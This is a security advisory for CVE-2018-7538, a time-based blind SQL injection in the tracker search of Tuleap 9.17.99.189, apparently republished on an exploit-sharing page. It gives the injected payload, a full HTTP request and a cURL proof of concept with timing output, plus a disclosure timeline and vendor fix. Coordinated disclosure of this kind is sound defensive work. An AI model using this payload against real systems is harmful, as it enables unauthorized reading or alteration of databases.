扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 |
=============================================================================== title: Tuleap SQL Injection case id: CM-2018-01 product: Tuleap version 9.17.99.189 vulnerability type: Blind SQL injection - time based severity: High found: 2018-02-24 by: Cristiano Maruti (@cmaruti) =============================================================================== [EXECUTIVE SUMMARY] Enalean Tuleap is a project management system for application lifecycles management, agile development and design projects, requirement management, IT services management, and so on. The analysis discovered a time-based blind SQL injection vulnerability (OTG-INPVAL-005) in the tracker functionality of Tuleap software engineering platform. A malicious user can inject arbitrary SQL commands to the application. The vulnerability lies in the project tracker service search functionality; depending on project visibility successful exploitation may or may not require user authentication. A successful attack can read, modify or delete data from the database or, depending on the privilege of the user (default: restricted) and the database engine in use (default: MySQL), execute arbitrary commands on the underlying system. [VULNERABLE VERSIONS] The following version of the Tuleap software was affected by the vulnerability; previous versions may be vulnerable as well: - Tuleap version 9.17.99.189 [TECHNICAL DETAILS] It is possible to reproduce the vulnerability following these steps: 1. Open the tracker service in a publicly visible project 2. Leave all the fields empty and submit the search form while logging the request with the help of an application proxy like Burp or ZAP 3. Copy the previous request and edit the "criteria[499][values][]" field in the request body with the "(select(0)from(select(sleep(3)))a)/**/" payload 4. Send the request to the application 5. Application will respond with a three second delay Below a full transcript of the HTTP request used to raise the vulnerability and also a cURL one liner to highlight the induced delay in the application response. HTTP Request ------------------------------------------------------------------------------- POST /plugins/tracker/?tracker=16 HTTP/1.1 Host: 192.168.137.130 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://192.168.137.130/plugins/tracker/?tracker=16 Content-Type: application/x-www-form-urlencoded Content-Length: 278 Cookie: __Host-TULEAP_PHPSESSID=r7d1mk87sfn9kadlkh64h25354 Connection: close Upgrade-Insecure-Requests: 1 report=124&criteria%5B504%5D=&criteria%5B489%5D=&criteria%5B495%5D%5Bvalues%5D= &criteria%5B495%5D%5Bvalues%5D%5B%5D=&criteria%5B499%5D%5Bvalues%5D= &criteria%5B499%5D%5Bvalues%5D%5B%5D=(select(0)from(select(sleep(3)))a)/**/ &additional_criteria%5Bcomment%5D=&tracker_query_submit= ------------------------------------------------------------------------------- cURL PoC ------------------------------------------------------------------------------- # time curl -k -X POST -d @sql.txt -H 'Cookie: __Host-TULEAP_PHPSESSID=<VALID>' https://192.168.137.130/plugins/tracker/?tracker=16 [OUTPUT TRUNCATED] </script></body> </html> real0m3.117s user0m0.033s sys 0m0.021s # cat sql.txt report=124&criteria%5B504%5D=&criteria%5B489%5D=&criteria%5B495%5D%5Bvalues%5D= &criteria%5B495%5D%5Bvalues%5D%5B%5D=&criteria%5B499%5D%5Bvalues%5D= &criteria%5B499%5D%5Bvalues%5D%5B%5D=(select(0)from(select(sleep(3)))a)/**/ &additional_criteria%5Bcomment%5D=&tracker_query_submit= ------------------------------------------------------------------------------- A copy of the report with technical details about the vulnerability I have identified is available at: https://github.com/cmaruti/reports/blob/master/tuleap.pdf [VULNERABILITY REFERENCE] The following CVE ID was allocated to track the vulnerabilities: CVE-2018-7538 [DISCLOSURE TIMELINE] 2018-02-26 Vulnerability submitted to vendor through e-mail. Vendor requested more info and acknowledged the problem later. 2018-02-27Researcher requested to allocate a CVE number. 2018-02-27Vendor released a fix for the reported issue. 2018-03-08Researcher requested to publicly disclose the issue; public coordinated disclosure. [SOLUTION] Enalean released an update to fix the vulnerability (Tuleap 9.18 or later). Please see the below link for further information released by the vendor: - https://tuleap.net/plugins/tracker/?aid=11192 [REPORT URL] https://github.com/cmaruti/reports/blob/master/tuleap.pdf |
体验盒子
